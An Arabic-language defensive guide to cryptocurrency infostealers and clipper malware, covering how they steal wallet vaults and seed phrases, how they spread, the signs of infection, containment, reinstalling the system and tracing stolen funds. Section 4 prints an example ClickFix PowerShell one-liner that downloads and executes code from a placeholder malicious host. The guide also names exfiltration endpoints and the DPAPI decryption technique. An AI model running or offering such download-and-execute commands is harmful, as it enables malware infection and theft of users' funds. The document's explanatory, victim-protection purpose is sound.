برمجيات سرقة المعلومات الخبيثة للعملات المشفرة: كيف تستهدف أحصنة طروادة المفاتيح الخاصة بالمحافظ وامتدادات المتصفح وبيانات الحافظة — الكشف والتطهير واسترداد الضحايا
برزت برمجيات سرقة المعلومات الخبيثة (Infostealers) كواحدة من أكثر نواقل التهديد انتشاراً وتدميراً التي تواجه مستثمري العملات المشفرة، ورواد التمويل اللامركزي (DeFi)، والجهات المؤسسية الحاضنة للأصول الرقمية. وخلافاً لبرمجيات الفدية التقليدية التي تشفر أنظمة الملفات علناً لطلب مبالغ فدية وابتزاز، تعمل برمجيات سرقة العملات المشفرة الحديثة في صمت شبه تام. حيث تخترق حمولات أحصنة طروادة هذه دفاعات الأجهزة الطرفية، وتجري فحصاً منهجياً لوحدات التخزين المحلية وذاكرة النظام، وتستخرج خزائن امتدادات المتصفح المشفرة، وتستولي على عبارات الاسترداد (Seed Phrases)، وتعترض وجهات المعاملات في الوقت الفعلي. بالنسبة للضحايا الذين يستيقظون ليجدوا أرصدتهم قد فُرغت بالكامل عبر MetaMask أو Phantom أو Coinbase Wallet أو تطبيقات سطح المكتب، فإن فهم كيفية حدوث هذه الاختراقات يمثل الخطوة الأولى الحاسمة لوقف الاستغلال المستمر، وتطهير البنية التحتية التقنية، واتخاذ إجراءات جنائية حاسمة لتتبع رأس المال المسروق واسترداده.
1. فهم برمجيات سرقة المعلومات الخبيثة للعملات المشفرة: آليات سرقة البيانات
تمثل برمجيات سرقة المعلومات الخبيثة للعملات المشفرة (Infostealers) فئة متخصصة من برمجيات أحصنة طروادة المصممة خصيصاً لاكتشاف أسرار المصادقة وبيانات الاعتماد الحساسة والمواد التشفيرية وجمعها واستخراجها من أنظمة التشغيل المخترقة. وفي حين ركزت البرمجيات الخبيثة التقليدية تاريخياً على شبكات البوت نت المخصصة لهجمات حجب الخدمة الموزعة (DDoS) أو التشفير التخريبي للملفات، فإن اقتصاد الجريمة السيبرانية الحديث يعطي الأولوية لاستنزاف الأصول في صمت. وبمجرد تنفيذ حمولة برمجية السرقة على الجهاز الطرفي، فإنها تنجز مهمتها الخبيثة في غضون ثوانٍ معدودة، وغالباً ما تنهي عملها بنفسها أو تظل كامنة قبل أن تتمكن حلول الأمان المستندة إلى المضيف من رصد أي نشاط غير طبيعي.
وقد تعزز الطابع التجاري لهذا التهديد عبر نموذج توزيع "البرمجيات الخبيثة كخدمة" (MaaS). ففي منتديات الويب المظلم (Darknet) وقنوات Telegram غير المشروعة، تقوم اتحادات المطورين المتخصصة بتأجير الملفات الثنائية المجمعة ولوحات إدارة الويب وأدوات البناء الآلية لشركاء تابعين منخفضي المهارة بموجب اشتراكات شهرية أو ترتيبات لتقاسم الأرباح. وقد أسست عائلات برمجيات خبيثة معروفة، من بينها RedLine Stealer و META و Vidar و Raccoon Stealer و Lumma Stealer، سلاسل توريد معقدة. وكما أوضح باحثو الأمن السيبراني في SentinelOne، ينشر مشغلو برمجيات السرقة استراتيجيات توزيع شديدة الاستهداف، مثل حملات ClickFix، مستغلين الهندسة الاجتماعية النفسية وإرهاق التحقق لتشغيل برمجيات نصية تسحب بصمت الملفات الثنائية للحمولة من البنية التحتية الخارجية للتحكم والسيطرة (C2).
وقد تجلى النطاق العالمي لهذا النظام البيئي من خلال عمليات كبرى لإنفاذ القانون الدولي. ففي أواخر عام 2024، نسقت Eurojust عملية Operation Magnus، وهي تحالف متعدد الجنسيات ضم سلطات من هولندا والولايات المتحدة وبلجيكا والبرتغال والمملكة المتحدة وأستراليا نجح في تفكيك البنية التحتية للخوادم المركزية الداعمة لبرمجيتي RedLine و META. وكشفت السجلات الجنائية التي تمت مصادرتها أثناء عملية الإسقاط أن هذين المتغيرين وحدهما اخترقا ملايين الأنظمة الفردية حول العالم، وسرقا مليارات من بيانات الاعتماد وسجلات المتصفح وملفات محافظ العملات المشفرة.
خلاصة تقنية: دورة الحياة التشغيلية لبرمجيات سرقة المعلومات
سرعة التنفيذ: تنفذ برمجيات السرقة الحديثة مثل Lumma و Vidar عمليات جمع البيانات وتجميع الملفات وتسريبها عبر الشبكة في أقل من 45 ثانية بعد حقن العملية.
الأصول المستهدفة: تحدد الحمولات تلقائياً مواقع مفاتيح التشفير الرئيسية لمتصفحات Chromium، وتفك تشفير مخازن LevelDB للامتدادات، وتستولي على ملفات تهيئة محافظ سطح المكتب، وتمسح أدلة المستخدم بحثاً عن أنماط الكلمات المفتاحية (Mnemonic).
تحقيق الدخل الآلي: تتم معالجة الأرشيفات المسربة ("السجلات" أو Logs) بواسطة نصوص برمجية آلية تفرز بيانات الاعتماد وتوجه على الفور عبارات استرداد العملات المشفرة إلى بوتات إفراغ المحافظ الآلية.
وفقاً لتقرير Chainalysis لجرائم الكريبتو لعام 2026 (Chainalysis 2026 Crypto Crime Report)، فإن الأموال المسروقة الناتجة عن اختراقات البرمجيات الخبيثة واختراق الأجهزة الطرفية تمثل مئات الملايين من الدولارات من الخسائر السنوية على السلسلة (On-chain). وعوضاً عن فحص السجلات المسروقة يدوياً، تنشر شبكات التهديد الحديثة أدوات تحليل آلية للسجلات تستوعب الأرشيفات المضغوطة المسربة عبر طلبات HTTP POST المشفرة أو واجهات برمجة تطبيقات Telegram Bot API. وعند التعرف على مفاتيح خاصة أو عبارات استرداد صالحة، تقوم العقود الذكية وبوتات المعاملات الآلية المخصصة لتفريغ المحافظ على الفور بكنس جميع الأرصدة المرتبطة بها، ونقل الأصول الرقمية إلى مسارات غسيل أموال متعددة القفزات في غضون دقائق من الإصابة الأولية.
2. كيف تستخرج برمجيات السرقة المفاتيح الخاصة وخزائن امتدادات المتصفح وعبارات الاسترداد
تعتمد امتدادات متصفحات Web3 غير الاحتجازية مثل MetaMask و Phantom و Coinbase Wallet و Rabby و TronLink على واجهات برمجة تطبيقات تخزين المتصفح القياسية. وفي كلٍ من المتصفحات المعتمدة على Chromium (مثل Google Chrome و Brave و Microsoft Edge و Opera) والمتصفحات المعتمدة على Gecko (مثل Mozilla Firefox)، تُكتب حالة الامتداد في أدلة أقراص محلية منسقة كقواعد بيانات LevelDB أو SQLite.
آلية فك التشفير عبر Windows DPAPI
تقوم متصفحات Chromium بتشفير البيانات الحساسة المخزنة باستخدام مفتاح رئيسي مشفر يقع في ملف تهيئة JSON يُدعى "Local State". في نظام Windows، تتم حماية هذا المفتاح الرئيسي عبر دالة CryptProtectData التابعة لواجهة حماية بيانات ويندوز (Windows Data Protection API - DPAPI). تحمي DPAPI الأسرار من حسابات المستخدمين الأخرى على الجهاز، ولكن أي ملف تنفيذي يعمل في سياق المستخدم الذي سجل دخوله يمكنه استدعاء دالة CryptUnprotectData لفك تشفير المفتاح الرئيسي دون إطلاق مطالبات التحكم في حساب المستخدم (UAC) الإدارية.
وكما هو موثق في التحليل الأمني من Huntress Threat Library، فإن برمجيات السرقة مثل Lumma Stealer تحدد مسار دليل Local State، وتنفذ دالة CryptUnprotectData على المفتاح الرئيسي المشفر، وتحصل على مفتاح AES المتماثل الخام في الذاكرة. وباستخدام هذا المفتاح، تستعلم البرمجية الخبيثة عن أدلة الامتدادات بالاعتماد على معرفات ثابتة ومحددة مسبقاً، مثل MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn) أو Phantom (bfnaelmomeimhlpmgjnjophhpkkoljpa). وتنسخ البرمجية الخبيثة قاعدة بيانات LevelDB بالكامل والتي تحتوي على خزينة المحفظة المشفرة، وبيانات القيمة العشوائية (Salt)، وتجزئة كلمة المرور (Password Hash).
خلاصة رئيسية: الهجوم بالقوة الغاشمة دون اتصال على خزائن المتصفح
تسريب الخزائن: لا تخمن برمجيات السرقة كلمات مرور المحافظ على جهازك الطرفي. بل ترسل قواعد بيانات LevelDB المشفرة إلى خوادم خارجية حيث تقوم مجموعات معالجات الرسومات (GPU) الموزعة بتنفيذ هجمات القواميس والقوة الغاشمة بمعدل مليارات التجزئات في الثانية الواحدة.
ضعف كلمات المرور القصيرة: يمكن كسر كلمات مرور الامتدادات الضعيفة المكونة من 8 أحرف أو التركيبات الأبجدية الرقمية الشائعة في غضون دقائق من تسريب البيانات.
استهداف ملفات تطبيقات سطح المكتب والكلمات المفتاحية غير المشفرة
تستهدف برمجيات السرقة أيضاً تطبيقات محافظ العملات المشفرة المستقلة على سطح المكتب. وتكشف القياسات الأمنية عن بُعد الصادرة عن SlowMist Technology ووزارة العدل الأمريكية (DOJ) أن حمولات البرمجيات الخبيثة تستعلم بشكل منهجي عن مسارات الملفات الافتراضية لتطبيقات مثل Electrum (%APPDATA%\Electrum\wallets) و Exodus (%APPDATA%\Exodus\exodus.wallet) و Atomic Wallet و Wasabi Wallet.
وتتضمن برمجيات السرقة كذلك وحدات لكشط الملفات، حيث تفحص مجلدات سطح المكتب (Desktop) والمستندات (Documents) والتنزيلات (Downloads) بحثاً عن صيغ النصوص والمستندات (.txt، .docx، .pdf، .kdbx). وتستخدم الحمولات تعبيرات نمطية (Regular Expressions) لاكتشاف عبارات الاسترداد بتنسيق BIP-39 (المكونة من 12 أو 18 أو 24 كلمة قياسية)، والمفاتيح الخاصة الخام المكونة من 64 حرفاً، ومفاتيح API الخاصة بمنصات التداول. كما تلتقط العديد من المتغيرات لقطات لشاشة سطح المكتب فور التنفيذ لجمع بيانات الاعتماد أو الملاحظات المعروضة.
3. قراصنة الحافظة وبرمجيات Clipper الخبيثة: التهديد الصامت لاستبدال العناوين
تتلاعب برمجيات قراصنة الحافظة (Clipboard Hijackers)، المعروفة ببرمجيات Clipper الخبيثة، بمخزن ذاكرة الحافظة في نظام التشغيل في الوقت الفعلي. ونظراً لأن العناوين العامة للعملات المشفرة تتكون من سلاسل أبجدية رقمية طويلة ومعقدة، يعتمد مستخدمو العملات المشفرة بشكل روتيني على نسخ عناوين الوجهة ولصقها عند بدء التحويلات. وتخترق برمجيات Clipper سير العمل هذا عن طريق الاستبدال الصامت لعنوان المستلم المقصود بعنوان آخر يتحكم فيه المهاجم.
مراقبة واجهات برمجة التطبيقات ومطابقة التعبيرات النمطية
تراقب برمجيات Clipper مخزن الحافظة المؤقت باستخدام دوال واجهة برمجة تطبيقات Windows (Windows API) مثل GetClipboardData و SetClipboardData. وكلما تم نسخ نص، تقيم البرمجية الخبيثة السلسلة النصية عبر تعبيرات نمطية محسنة تتعرف على تنسيقات عناوين العملات المشفرة الرئيسية:
- Bitcoin (BTC): تنسيقات العناوين التقليدية P2PKH (التي تبدأ بـ "1")، و P2SH (التي تبدأ بـ "3")، و SegWit Bech32 (التي تبدأ بـ "bc1q")، و Taproot (التي تبدأ بـ "bc1p").
- سلاسل Ethereum و EVM المتوافقة (ETH و BNB و MATIC): سلاسل سداسية عشرية مكونة من 40 حرفاً تبدأ بالبادئة "0x".
- Solana (SOL): سلاسل مرمزة بنظام Base58 تتراوح بين 32 و 44 حرفاً أبجدياً رقمياً.
- TRON (TRX / USDT-TRC20): سلاسل مكونة من 34 حرفاً تبدأ بحرف "T".
وعند اكتشاف نمط يطابق عنواناً مشفراً، يستبدل قاطع الحافظة على الفور محتوى المخزن المؤقت بعنوان مملوك للمهاجم على نفس شبكة البلوكتشين في أجزاء من الثانية، مما يجعل عملية الاستبدال غير ملحوظة أثناء عمليات النسخ واللصق المعتادة.
المراوغة بالعناوين المخصصة واختراق محافظ الأجهزة
تُظهر الأبحاث الأكاديمية المنشورة على arXiv والتي تفصل هجوم "EthClipper" كيف يقوم المهاجمون بتوليد ملايين العناوين المخصصة مسبقاً (Vanity Addresses) التي تتطابق بدقة مع أول 4 إلى 6 أحرف وآخر 4 إلى 6 أحرف من عناوين الضحايا. ونظراً لأن العادات البصرية البشرية تكتفي عادةً بفحص بداية العنوان ونهايته فقط، فإن الضحايا يوافقون بشكل متكرر على معاملات مرسلة إلى عناوين المهاجم الشبيهة المخصصة.
خطر جسيم: محافظ الأجهزة ليست منيعة ضد برمجيات Clipper
سلامة الجهاز المضيف: تحمي محفظة الأجهزة المفاتيح الخاصة من الاستخراج، لكنها لا تستطيع منع المستخدمين من التوقيع على معاملة مرسلة إلى عنوان مستلم غير صحيح.
التحقق من الشاشة: إذا استبدلت برمجية Clipper العنوان على جهاز الكمبيوتر الخاص بك، فإن محفظة الأجهزة ستعرض العنوان المستبدل على شاشتها الفعلية. وإن الفشل في فحص جميع أحرف العنوان على الشاشة الفعلية للمحفظة هو ما يمنح برمجيات Vanity Clipper فرصة النجاح.
تُظهر البيانات الموثقة بواسطة SlowMist Technology أن وحدات Clipper تُدمج مباشرة في حزم برمجيات سرقة المعلومات أو يتم توزيعها من خلال أدوات Web3 ملغمة بأحصنة طروادة. ونظراً لأن برمجيات Clipper تتطلب حداً أدنى من التعليمات البرمجية، فإنها تحافظ على بصمة استهلاك ذاكرة منخفضة للغاية وتفلت من تواقيع برامج مكافحة الفيروسات الثابتة، مما يمكنها من البقاء نشطة على الأجهزة لعدة أشهر.
4. نواقل توزيع الجهات المهددة: الإعلانات الخبيثة، البرامج المقرصنة، وطعوم التصيد الاحتيالي
تدير عصابات برمجيات سرقة المعلومات الحديثة شبكات توزيع متعددة القنوات مصممة لخداع الأهداف وحثهم على تشغيل تعليمات برمجية خبيثة. ويتم استهداف مستثمري العملات المشفرة ومهندسي Web3 ومتداولي الأصول الرقمية عبر التلاعب بمحركات البحث والهندسة الاجتماعية وسلاسل التوريد الرقمية المخترقة.
حملات الإعلانات الخبيثة عبر محركات البحث (Malvertising)
يعد انتحال إعلانات محركات البحث أحد أبرز نواقل الهجوم. فقد أصدر مركز شكاوى جرائم الإنترنت (IC3) التابع لمكتب التحقيقات الفيدرالي (FBI) تحذيراً للخدمة العامة يوضح فيه بالتفصيل كيف يشتري مجرمو الإنترنت إعلانات بحث مدفوعة وممولة عبر Google Ads و Bing Ads. وتزايد الجهات المهددة على مصطلحات بحث عالية القصد والقيمة مثل "download metamask" أو "phantom wallet extension" أو "tradingview desktop" أو "exodus wallet download".
وعندما يقوم المستخدم بالبحث، يظهر الإعلان الاحتيالي الممول أعلى نتائج البحث الأصلية. ويؤدي النقر عليه إلى إعادة توجيه الضحية عبر مرشحات تمويه وإخفاء تعرض محتوى حميداً لبرامج الزحف التابعة لمحركات البحث بينما تقدم نسخة طبق الأصل من المشروع الشرعي للمستخدمين. ويؤدي تنزيل برنامج التثبيت إلى تشغيل أداة تنزيل برمجيات خبيثة مبهمة (Dropper) تحتوي على RedLine أو Vidar أو Lumma Stealer.
تقنية هجوم التحقق الخادع ClickFix
تسلط الأبحاث الأمنية الصادرة عن SentinelOne و Qualys Threat Research الضوء على الانتشار الواسع لهجوم الهندسة الاجتماعية المعروف باسم "ClickFix". حيث تعرض المواقع الخبيثة أخطاء وهمية مصطنعة، مثل تحديات Cloudflare CAPTCHA الزائفة، أو تحذيرات من تعطل برامج ترميز الفيديو، أو تنبيهات وهمية لتحديث المتصفح.
ويُطلب من المستخدم الضغط على مفتاح Windows + R، ولصق السلسلة المنسوخة في نافذة التشغيل (Run)، ثم الضغط على Enter. وفي الواقع، تحتوي الحمولة المنسوخة في الحافظة على أمر PowerShell مموه (مثل powershell -w hidden -c "iex(New-Object Net.WebClient).DownloadString('https://malicious-cdn...')"). ولأن المستخدم هو من ينفذ الأمر يدوياً، فإن أنظمة حماية الأجهزة الطرفية غالباً ما تعامل هذا الإجراء كنشاط إداري شرعي، مما يؤدي إلى تجاوز جدران الحماية المحيطية.
تفصيل نواقل التوزيع: المصادر الأساسية للإصابة
إعلانات محركات البحث: إعلانات منتحلة تتصدر نتائج البحث وتنتحل صفة برامج محافظ الأجهزة وامتدادات Web3 ومحطات التداول.
طعوم CAPTCHA التفاعلية: مطالبات ClickFix التي تخدع المستخدمين لتشغيل نصوص PowerShell البرمجية المرمزة بـ base64 في نافذة Run بنظام Windows.
طعوم التوظيف والمطورين: عروض عمل احتيالية على Telegram و Discord و LinkedIn تطلب من المطورين اختبار مستودعات أكواد تحتوي على تبعيات npm خبيثة.
بوابات الدعم التقني المنتحلة والتواصل المباشر الاحتيالي
وفي تنبيه لاحق، أكد مكتب التحقيقات الفيدرالي FBI IC3 على تزايد بوابات الدعم الفني المنتحلة ومحاولات التواصل الخادعة مع المطورين. ففي مجتمعات مطوري العملات المشفرة، ينتحل المهاجمون صفة مسؤولي توظيف أو مؤسسي شركات ناشئة في مجال Web3، داعين المرشحين لإكمال اختبارات تقييم برمجي. وتحتوي المستودعات المقدمة على تبعيات برمجية ملغمة تقوم بتنفيذ حمولة سرقة المعلومات في اللحظة التي يتم فيها تشغيل أمر npm install.
5. علامات التحذير: كيفية التعرف على إصابة نشطة ببرمجيات سرقة المعلومات على جهازك
صُممت برمجيات سرقة المعلومات لتكون خفية وشديدة التخفي، إلا أن تشغيلها يُنتج أدلة جنائية رقمية وشذوذاً سلوكياً مميزاً على النظام. ويمكن أن يؤدي اكتشاف الإصابة النشطة قبل أن تكمل الجهات المهددة تحويل البيانات المسربة إلى مكاسب مالية إلى منع الخسارة الكاملة للأصول.
المؤشرات السلوكية على الجهاز الطرفي
نظراً لأن برمجيات السرقة تتفاعل مباشرة مع مخازن الملفات المحلية وعمليات المتصفح، غالباً ما يلاحظ الضحايا اضطرابات مفاجئة في النظام. وتكشف الأبحاث المستمدة من Huntress Threat Library و Qualys عن العديد من المؤشرات البارزة على الأجهزة المصابة:
- أعطال مفاجئة للمتصفح وإعادة تشغيل ملفات التعريف: تُنهي برمجيات السرقة عمليات المتصفح النشطة (مثل
chrome.exeأوbrave.exe) لفك أقفال ملفات قواعد بيانات SQLite و LevelDB والوصول إليها. - وميض نوافذ موجه الأوامر: ظهور خاطف لنوافذ سطر الأوامر أو PowerShell لأجزاء من الثانية أثناء بدء تشغيل النظام أو بعد النقر على رابط إلكتروني.
- التلاعب بأنظمة مكافحة البرمجيات الخبيثة: إجراء إضافات غير مصرح بها إلى مسار سجل الاستثناءات في Windows Defender (
HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths). - عمليات خلفية مريبة: تشغيل ملفات تنفيذية بأسماء عشوائية من أدلة مؤقتة مثل
%APPDATA%أوC:\Users\Public\تستهلك قدراً غير منتظم من موارد المعالج (CPU).
شذوذ حركة مرور الشبكة والاتصالات
تسلط البيانات المنشورة بواسطة Darktrace Threat Insights الضوء على التواقيع الشبكية المرتبطة بتسريب بيانات برمجيات السرقة. فبعد جمع الملفات المحلية، تجمع البرمجية الخبيثة كلمات المرور وملفات تعريف الارتباط (Cookies) ومفاتيح المحافظ في أرشيفات مشفرة، وتبدأ في إرسال طلبات HTTP POST صادرة إلى خوادم C2 البعيدة أو تستخدم قنوات Telegram Bot API (مثل الطلبات الموجهة إلى api.telegram.org/bot[token]/sendDocument).
علامات التحذير السلوكية على سلسلة البلوكتشين (On-Chain)
تحويلات تمويل رسوم الغاز: تودع الجهات المهددة مبالغ صغيرة من رموز الغاز الأصلية (مثل ETH أو SOL أو TRX) في محفظتك من عناوين وسيطة مجهولة لتوفير الغاز اللازم لتحويل أرصدة العملات المستقرة الأكبر حجماً خارج المحفظة.
السحب الآلي للأرصدة (Sweeps): تصفير مفاجئ لأرصدة المحفظة دون ظهور أي مطالبات للتوقيع أو الموافقة في امتداد المتصفح الخاص بك.
التوجيه متعدد القفزات: توضح معلومات استخبارات البلوكتشين من TRM Labs أن معاملات تفريغ المحافظ الناتجة عن برمجيات السرقة يتم توجيهها في غضون ثوانٍ عبر منصات التداول اللامركزية أو جسور البلوكتشين المتعددة السلاسل (Cross-Chain Bridges).
6. الاحتواء في حالات الطوارئ: عزل الأنظمة المخترقة وتأمين الأصول الرقمية
إذا كنت تشتبه في تشغيل برمجية لسرقة المعلومات على جهاز الكمبيوتر الخاص بك أو لاحظت معاملات غير مصرح بها، فإن الاحتواء الفوري يمثل أمراً بالغ الأهمية. فغالباً ما يدفع الذعر الضحايا إلى تشغيل عمليات فحص مطولة لمكافحة الفيروسات على الجهاز المصاب، مما يمنح الجهات الخبيثة وقتاً كافياً لإكمال تسريب البيانات الجاري أو قد يؤدي إلى تنشيط إجراءات مسح البيانات التخريبية.
الخطوة 1: قطع جميع اتصالات الشبكة فوراً
العزل الكامل عن الشبكة هو أول إجراء إلزامي. افصل كابلات Ethernet المادية، وعطّل شبكات Wi-Fi والبلوتوث، أو فعّل وضع الطيران الفعلي للأجهزة. ويؤدي إنهاء الاتصال بالإنترنت إلى قطع مقابس اتصال C2 النشطة، وإيقاف عمليات التسريب المعلقة، وتعطيل التنفيذ عن بُعد. ولا تقم بإعادة تشغيل الكمبيوتر على الفور، نظراً لأن الذاكرة العشوائية المتطايرة (RAM) تحتوي على بيانات جنائية رقمية لا تقدر بثمن.
الخطوة 2: الانتقال إلى بيئة نظيفة ومعزولة
لا تحاول أبداً إنقاذ أصول العملات المشفرة من الجهاز المصاب نفسه؛ فكل ضغطة مفتاح أو عبارة استرداد تتم كتابتها على نظام مخترق يمكن تسجيلها بواسطة برمجيات تسجيل ضربات المفاتيح (Keyloggers) النشطة. وكما تم التأكيد عليه في التنبيهات الأمنية المشتركة من FBI IC3، يجب أن تتم جميع إجراءات الاستجابة للحوادث من جهاز نظيف وموثوق تماماً:
- استخدم جهاز كمبيوتر ثانوياً نظيفاً أو هاتفاً ذكياً مهيأً حديثاً يعمل عبر بيانات الهاتف الخلوي (وليس شبكة Wi-Fi المحلية التي قد تكون مخترقة).
- أنشئ محفظة أجهزة جديدة تماماً أو محفظة برمجية جديدة تم إنشاؤها باستخدام عبارة استرداد جديدة كلياً لم يسبق استخدامها.
- إياك واستيراد عبارة استرداد مخترقة: لا تقم أبداً باستيراد عبارة الاسترداد السابقة إلى جهاز جديد؛ فبمجرد سرقة عبارة الاسترداد، تصبح جميع العناوين العامة المشتقة منها عبر كل شبكات البلوكتشين غير آمنة بشكل دائم.
فرز عملي عاجل: التسلسل الهرمي لإخلاء الأصول
الأولوية 1: العملات والرموز السائلة القابلة للتحويل: بادر فوراً بنقل الرموز السائلة عالية القيمة (مثل Bitcoin و Ethereum و Solana و USDT و USDC) إلى عنوان التخزين البارد الآمن الذي أنشأته حديثاً.
الأولوية 2: الأصول المرهونة (Staked) والمغلقة: راجع بروتوكولات التمويل اللامركزي (DeFi) التي تم رهن أو قفل ضماناتك فيها. وإذا سمحت فترات فك الرهن، ابدأ طلبات السحب إلى العناوين النظيفة، أو قم بإلغاء أذونات العقود لمنع أدوات سحب الأموال الخبيثة.
الأولوية 3: حسابات منصات التداول المركزية: سجل الدخول من جهازك النظيف إلى منصات التداول المركزية (مثل Binance و Coinbase و Kraken). وأنهِ جميع الجلسات النشطة، وأعد ضبط كلمات المرور، وقم بتدوير مفاتيح المصادقة الثنائية (2FA)، وعطّل مفاتيح API المفتوحة.
الخطوة 3: إلغاء الأذونات النشطة ورموز الجلسات
إذا كانت هناك أذونات عقود ذكية قد مُنحت سابقاً من المحفظة المتضررة، فاستخدم أداة لإدارة الصلاحيات مثل Revoke.cash أو واجهات الموافقة الرسمية على مستكشفات الكتل من جهازك النظيف. ورغم أن إلغاء الأذونات لن يمنع السارق الذي يمتلك المفاتيح الخاصة الخام من تحويل العملات الأصلية، إلا أنه يمنع عقود التصريف الآلية من سحب الرموز المميزة المسموح بها مسبقاً.
7. التطهير الشامل للجهاز وإعادة بناء بيئة تشغيل آمنة
من الأخطاء الشائعة التي يقع فيها ضحايا البرمجيات الخبيثة الاعتماد على برامج مكافحة الفيروسات التجارية "لتطهير" النظام المصاب. ففي حين قد تكتشف برامج فحص الأجهزة الملف التنفيذي الأولي (Dropper)، فإن برمجيات سرقة المعلومات تحقن التعليمات البرمجية (Shellcode) داخل عمليات النظام الشرعية، وتعدل تكوينات الإقلاع، وتنشئ مهاماً مجدولة، وتزرع أدوات وصول عن بُعد ثانوية أو برمجيات Clipper مستمرة داخل أدلة النظام.
ضرورة إعادة التثبيت الكامل لنظام التشغيل من الصفر (Bare-Metal)
كما هو موثق في التقارير الجنائية التي أعقبت إجراءات إنفاذ القانون من قبل وزارة العدل (DOJ) ضد عصابات برمجيات السرقة، فإن الحمولات الخبيثة تؤسس في كثير من الأحيان آليات ثبات عميقة في النظام. وتؤكد التحليلات الأمنية الصادرة عن Darktrace أن برمجيات السرقة المتقدمة تنجو من نقاط استعادة النظام البسيطة. ولذلك، فإن استعادة السلامة الحاسوبية الكاملة تتطلب إعادة تثبيت شاملة من الصفر:
- إنشاء وسائط التثبيت على جهاز نظيف: قم بإعداد محرك أقراص USB قابل للإقلاع باستخدام أداة Media Creation Tool الرسمية من Microsoft أو توزيعة Linux رسمية، انطلاقاً من جهاز كمبيوتر موثوق وغير مخترق.
- إعادة تقسيم القرص بالكامل وتهيئته: احذف جميع أقسام القرص الصلب الحالية وأجرِ تهيئة كاملة (Full Format). وتجنب خيارات "إعادة الضبط السريع" أو "الاحتفاظ بملفاتي"، حيث يمكن للملفات الثنائية الخبيثة الاختباء داخل أدلة بيانات المستخدم المحفوظة.
- تحديث البرامج الثابتة UEFI/BIOS للوحة الأم: قم بتثبيت أحدث إصدار للبرامج الثابتة مباشرة من البوابة الرسمية للشركة المصنعة للحد من مخاطر التهديدات المستمرة على مستوى البرامج الثابتة (Firmware-Level Persistence).
إبطال بيانات الاعتماد وتدمير الجلسات النشطة
نظراً لأن برمجيات سرقة المعلومات تستولي على ملفات تعريف ارتباط الجلسات النشطة في المتصفح (Cookies)، فإن الجهات المهددة تتمكن من تجاوز المصادقة متعددة العوامل (MFA) عبر اختطاف الجلسات (Session Hijacking). وإعادة تثبيت نظام التشغيل لا تلغي صلاحية ملفات تعريف الارتباط التي تم إرسالها بالفعل إلى خوادم C2. لذلك، يجب عليك من جهاز ثانوي آمن إلغاء جميع الجلسات النشطة يدوياً عبر موفري البريد الإلكتروني، ومديري كلمات المرور، والمنصات السحابية، ومنصات تداول العملات المشفرة، وذلك باختيار "تسجيل الخروج من جميع الجلسات الأخرى".
بروتوكول التحصين: البنية المستقبلية للأجهزة الطرفية
أجهزة مخصصة للمعاملات: يجب على المتعاملين النشطين في Web3 الفصل بين أنشطتهم عبر تخصيص جهاز كمبيوتر محمول محصن يُستخدم حصراً لتوقيع معاملات البلوكتشين.
التحقق الفعلي عبر شاشة محفظة الأجهزة: الحد من مخاطر اختطاف الحافظة الموضحة في الأبحاث الأكاديمية لهجوم EthClipper، وذلك بفحص كل حرف من عنوان الوجهة بدقة على الشاشة المادية لمحفظة الأجهزة قبل بث المعاملة إلى الشبكة.
8. فرز الأصول المسروقة: التتبع الجنائي عبر البلوكتشين، الإبلاغ لإنفاذ القانون، والحلول القانونية
بمجرد اكتمال احتواء الأجهزة الطرفية وإعادة ضبط بيانات الاعتماد، يتحول مسار استجابة الضحية إلى فرز الأصول والتحقيق الجنائي بهدف الاسترداد. ورغم أن الطبيعة اللامركزية لسلاسل الكتل العامة تعني أنه لا يمكن لمسؤولي البروتوكول عكس المعاملات، إلا أن بنية السجل المالي الشفاف لشبكات Bitcoin و Ethereum و Solana وغيرها توفر مسار تدقيق غير قابل للمحو يستند إليه المحققون الجنائيون ووكالات إنفاذ القانون لتتبع مسار الأموال المسروقة.
حفظ الأدلة الجنائية الرقمية
قبل التواصل مع جهات التحقيق أو تقديم بلاغات رسمية، قم بإعداد ملف توثيقي شامل للحادثة. سجل كل تجزئة معاملة (TXID) مرتبطة بالسحب غير المصرح به، والطوابع الزمنية للتنفيذ، وشبكات البلوكتشين المعنية، وعناوين محفظة المستلم التابعة للمهاجم، وعناوين عقود الرموز المميزة. وقم بتصدير بيانات JSON الوصفية الأولية للمعاملات من مستكشفات البلوكتشين مثل Etherscan أو Solscan أو Tronscan. وإذا كان هناك أي تواصل سابق مع مسؤول توظيف احتيالي أو موقع ويب خبيث، فاحفظ عناوين URL الكاملة، وعناوين بروتوكول الإنترنت (IPs) المستضيفة، ونصوص المحادثات بالكامل.
التتبع على السلسلة والتحليل متعدد القفزات
لا تحتفظ الجهات المهددة بالعملات المشفرة المسروقة في محافظ التجميع الأولية. وتوضح أبحاث TRM Labs و Chainalysis أن العصابات تستعين بنصوص غسيل أموال برمجية مؤتمتة تقوم بنشر الأموال وتشتيتها سريعاً عبر عشرات العناوين الوسيطة. كما يتم توجيه الأصول عبر مجمعات السيولة اللامركزية، أو نقلها عبر جسور البلوكتشين المتعددة، أو تمريرها عبر بروتوكولات خلط العملات (Mixers).
تستخدم شركات استخبارات البلوكتشين المتخصصة محركات تحليلات رسومية بيانية متطورة لتتبع تدفقات الأموال عبر هياكل غسيل الأموال المعقدة. ولأن هذه العصابات تحتاج في نهاية المطاف إلى سيولة بالعملات النقدية الورقية (Fiat)، فإن الأموال المسروقة تتدفق في النهاية نحو مزودي خدمات الأصول الافتراضية المركزية (VASPs) أو وسطاء التداول خارج البورصة (OTC). وعندما يحدد التتبع على السلسلة إيداعات تدخل إلى منصة تداول خاضعة للتنظيم، ينسق المحققون تدخلاً عاجلاً لإنفاذ القانون لمطالبة فرق الامتثال في المنصة بإجراء تجميد طارئ للحساب قبل تحويل الأصول وسحبها.
السبل القانونية وقنوات الإبلاغ لإنفاذ القانون
تقديم بلاغ إلى FBI IC3: يجب على الضحايا في الولايات المتحدة تقديم شكوى مفصلة على الفور عبر موقع ic3.gov، وتصنيف الحادثة تحت بند الاختراق السيبراني وسرقة العملات الافتراضية، مع إرفاق جميع معرفات المعاملات وعناوين محافظ المهاجمين.
السلطات الدولية: يجب على الضحايا في أوروبا تقديم بلاغات إلى وحدات شرطة مكافحة الجرائم السيبرانية الوطنية مع الإشارة إلى أطر عمل Operation Magnus المنسقة بواسطة Eurojust و Europol.
